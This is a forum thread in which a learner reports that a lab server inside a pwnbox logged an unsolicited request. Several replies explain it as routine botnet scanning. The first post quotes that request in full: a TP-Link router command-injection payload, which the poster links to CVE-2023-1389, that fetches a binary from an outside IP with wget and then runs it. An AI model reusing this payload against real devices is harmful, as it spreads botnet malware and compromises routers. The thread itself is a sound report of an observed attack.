Possible unauthorized access to virtual machines

Site Feedback
1

Hello, first of all I want to say that I am a bit new here, and I am starting out in the academy.
But around 1:45 today, I was doing the activity from the Session Hijacking section of the Cross-Site Scripting module.
I had my local PHP server listening to incoming requests (those from the target of the exercise) when suddenly the server logs the following entry from an unknown IP (45.142.182.121):

GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm±rf+shk%3B+wget+http%3A%2F%2F176.97.210.230%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm±rf+shk%60)

I don’t like what I read there, it seems that it downloads a file from 176.97.210.230 (malicious according to the internet), executes it, then deletes it. And to top it all off, I have searched the internet for the command seen in the request and it seems to be related to CVE-2023-1389. If someone isn’t trying to trash the platform or make fun of it, then I don’t know what I read, nor do I understand why it landed on my local server. Btw it was within the pwnbox.

2 Likes
2

oh wow nice catch. Stupid botnets are the herpes of the internet. same thing happened to me but i freaked out and closed the pwnbox. Wishing i woulda did some digging also.

2 Likes
3

It is a totally prudent reaction. I hope they are taking care of this, it sows distrust when these things happen.

4

I have a feeling its going to highly depend on what data center you get connected to honestly. IF its a router firmware issue then the host would probably need to be the one to close that security hole.

5

Every time I run a server for transferring something into a host I pick up some access attempts.

I’ve had these while running HTTP server module with Python and Impacket’s smbserver (which I set a credential flag for access).

I’ve did an IP lookup once that resulted in western Europe, but not reliable.

6

I was surprised by what you said, it seems like it’s more recurring than I thought. I still have limited general knowledge about systems and security, but my question is whether our virtual machines should be configured to not allow requests from outside the secure environment when setting up a simple server. Shouldn’t they be isolated of this or maybe is there a gap?.
In any case, I have notified HTB so they can look into it.

1 Like
7

There is probably not anything specifically concerning here. It’s just botnet stuff that wasn’t successful. But it’s a good reminder to be careful what services you start and expose and where.